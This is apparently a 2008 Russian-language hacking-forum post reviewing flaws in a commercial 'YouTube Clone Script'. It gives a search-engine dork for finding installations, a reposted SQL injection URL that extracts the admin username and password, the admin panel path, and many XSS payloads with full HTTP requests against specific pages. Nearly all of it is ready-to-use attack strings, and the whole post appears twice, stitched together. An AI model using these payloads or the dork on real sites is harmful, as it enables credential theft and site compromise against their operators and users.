Dimi4
15.11.2008, 00:14
Обзор уязвимостей [YouTube] Clone Script
SITE: http://www.hispah.com/index.php?act=viewProd&productId=20
DORK: allinurl:"channel_detail.php?chid="
PRICE: 14.99$
Начнем с самого приятного. Нашол не я, у большинства сайтов уже фикс.
SQL Injection:
--==+=============================================== =================================+==--
--==+ YouTube Clone Script SQL Injection Vulnerability +==--
--==+=============================================== =================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://www.hispah.com/index.php?act=viewProd&productId=20
DORK: allinurl:"channel_detail.php?chid="
DESCRIPTION:
Remote SQL injection in msg.php id, able to pull admin user/pass.
EXPLOIT:
http://site.com/path/msg.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,0x7430705038755A7A20616E64207870726F67206F776E61 6765,convert(concat((SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F6E616D65),0x3a,(SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F70617373))/**/using/**/latin1),4,5,6,7,8,9/*
Tip/Note:
Majority of the sites require login to view msg.php None of the registration info is checked.
Admin Panel is in /siteadmin/
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
--==+=============================================== =================================+==--
--==+ YouTube Clone Script SQL Injection Vulnerability +==--
--==+=============================================== =================================+==--
# milw0rm.com [2007-07-02]
Cross Site Scripting (XSS)
Author: Dimi4
Found: 14.10.2008
Script: groups.php
Уязвимая переменная: catgy
Пример:
/groups.php?catgy=<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&chid=10
/groups.php?catgy=%3C/textarea%3E%3CScRiPt%20%0a%0d%3Ealert(/xek/)%3B%3C/ScRiPt%3E&chid=10
/groups.php?b=fr&catgy=email@some<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>domain.com
Script:login.php
Уязвимая переменная:username
Пример:
>'><ScRiPt>alert(/xek/);</ScRiPt>
POST /login.php?next=friends HTTP/1.0
Accept: */*
Host: localhost
Content-Length: 123
Cookie: PHPSESSID=3dd798ef2773154ae18238b238fb3fab
Connection: Close
Pragma: no-cache
username=>'><ScRiPt>alert(/xek/);</ScRiPt
Script: search_result.php
Уязвимая переменная: search_id,search_type
Пример:
/search_result.php?PHPSESSID=3dd798ef2773154ae18238 b238fb3fab&search_id=<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&search_type=related
/search_result.php?search_id=-&search_type=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&page=1&sort=adddate
Script: signup.php
Уязвимая переменная: next,add,email,username,
Пример:
/signup.php?next=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
/signup.php?next=friends&add=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
POST /signup.php?next=friends HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost
Content-Length: 221
Cookie: PHPSESSID=3dd798ef2773154ae18238b238fb3fab
Connection: Close
Pragma: no-cache
email=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&username=111-222-1933email@address.com&password1=111-222-1933email@address.com&password2=111-222-1933email@address.com&action_signup=%D0%E5%E3%E5%F1%F2%F0%E0%F6%B3%FF
POST /signup.php?next=friends HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost
Content-Length: 222
Cookie: PHPSESSID=3dd798ef2773154ae18238b238fb3fab
Connection: Close
Pragma: no-cache
email=111-222-1933email@address.com&username=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&password1=111-222-1933email@address.com&password2=111-222-1933email@address.com&action_signup=%D0%E5%E3%E5%F1%F2%F0%E0%F6%B3%FF
Script: video.php
Уязвимая переменная: viewtype,category
Пример:
video.php?category=md&viewtype=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
/video.php?category=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
Script: /view_video.php
Уязвимая переменная: page,viewkey,category
Пример:
view_video.php?viewkey=013ac554571fbd180e1c&page=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&viewtype=detailed&category=md&action=addfavour
view_video.php?viewkey=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
view_video.php?viewkey=013ac554571fbd180e1c&page=1&viewtype=detailed&category=>"><ScRiPt%20%0a%0d>alert(387790782)%3B</ScRiPt>
ВСЕ УЯЗВИМОСТИ НАЙДЕНЫ МНОЮ, ЗА ИСКЛЮЧЕНИЕМ ПЕРВОГО ЕКСПЛОЙТА
SITE: http://www.hispah.com/index.php?act=viewProd&productId=20
DORK: allinurl:"channel_detail.php?chid="
PRICE: 14.99$
Начнем с самого приятного. Нашол не я, у большинства сайтов уже фикс.
SQL Injection:
--==+=============================================== =================================+==--
--==+ YouTube Clone Script SQL Injection Vulnerability +==--
--==+=============================================== =================================+==--
AUTHOR: t0pP8uZz & xprog
SITE: http://www.hispah.com/index.php?act=viewProd&productId=20
DORK: allinurl:"channel_detail.php?chid="
DESCRIPTION:
Remote SQL injection in msg.php id, able to pull admin user/pass.
EXPLOIT:
http://site.com/path/msg.php?id=-1/**/UNION/**/ALL/**/SELECT/**/1,0x7430705038755A7A20616E64207870726F67206F776E61 6765,convert(concat((SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F6E616D65),0x3a,(SELECT/**/svalue/**/from/**/sconfig/**/where/**/soption=0x61646D696E5F70617373))/**/using/**/latin1),4,5,6,7,8,9/*
Tip/Note:
Majority of the sites require login to view msg.php None of the registration info is checked.
Admin Panel is in /siteadmin/
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
--==+=============================================== =================================+==--
--==+ YouTube Clone Script SQL Injection Vulnerability +==--
--==+=============================================== =================================+==--
# milw0rm.com [2007-07-02]
Cross Site Scripting (XSS)
Author: Dimi4
Found: 14.10.2008
Script: groups.php
Уязвимая переменная: catgy
Пример:
/groups.php?catgy=<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&chid=10
/groups.php?catgy=%3C/textarea%3E%3CScRiPt%20%0a%0d%3Ealert(/xek/)%3B%3C/ScRiPt%3E&chid=10
/groups.php?b=fr&catgy=email@some<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>domain.com
Script:login.php
Уязвимая переменная:username
Пример:
>'><ScRiPt>alert(/xek/);</ScRiPt>
POST /login.php?next=friends HTTP/1.0
Accept: */*
Host: localhost
Content-Length: 123
Cookie: PHPSESSID=3dd798ef2773154ae18238b238fb3fab
Connection: Close
Pragma: no-cache
username=>'><ScRiPt>alert(/xek/);</ScRiPt
Script: search_result.php
Уязвимая переменная: search_id,search_type
Пример:
/search_result.php?PHPSESSID=3dd798ef2773154ae18238 b238fb3fab&search_id=<ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&search_type=related
/search_result.php?search_id=-&search_type=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&page=1&sort=adddate
Script: signup.php
Уязвимая переменная: next,add,email,username,
Пример:
/signup.php?next=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
/signup.php?next=friends&add=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
POST /signup.php?next=friends HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost
Content-Length: 221
Cookie: PHPSESSID=3dd798ef2773154ae18238b238fb3fab
Connection: Close
Pragma: no-cache
email=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&username=111-222-1933email@address.com&password1=111-222-1933email@address.com&password2=111-222-1933email@address.com&action_signup=%D0%E5%E3%E5%F1%F2%F0%E0%F6%B3%FF
POST /signup.php?next=friends HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost
Content-Length: 222
Cookie: PHPSESSID=3dd798ef2773154ae18238b238fb3fab
Connection: Close
Pragma: no-cache
email=111-222-1933email@address.com&username=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&password1=111-222-1933email@address.com&password2=111-222-1933email@address.com&action_signup=%D0%E5%E3%E5%F1%F2%F0%E0%F6%B3%FF
Script: video.php
Уязвимая переменная: viewtype,category
Пример:
video.php?category=md&viewtype=>'><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
/video.php?category=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
Script: /view_video.php
Уязвимая переменная: page,viewkey,category
Пример:
view_video.php?viewkey=013ac554571fbd180e1c&page=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>&viewtype=detailed&category=md&action=addfavour
view_video.php?viewkey=>"><ScRiPt%20%0a%0d>alert(/xek/)%3B</ScRiPt>
view_video.php?viewkey=013ac554571fbd180e1c&page=1&viewtype=detailed&category=>"><ScRiPt%20%0a%0d>alert(387790782)%3B</ScRiPt>
ВСЕ УЯЗВИМОСТИ НАЙДЕНЫ МНОЮ, ЗА ИСКЛЮЧЕНИЕМ ПЕРВОГО ЕКСПЛОЙТА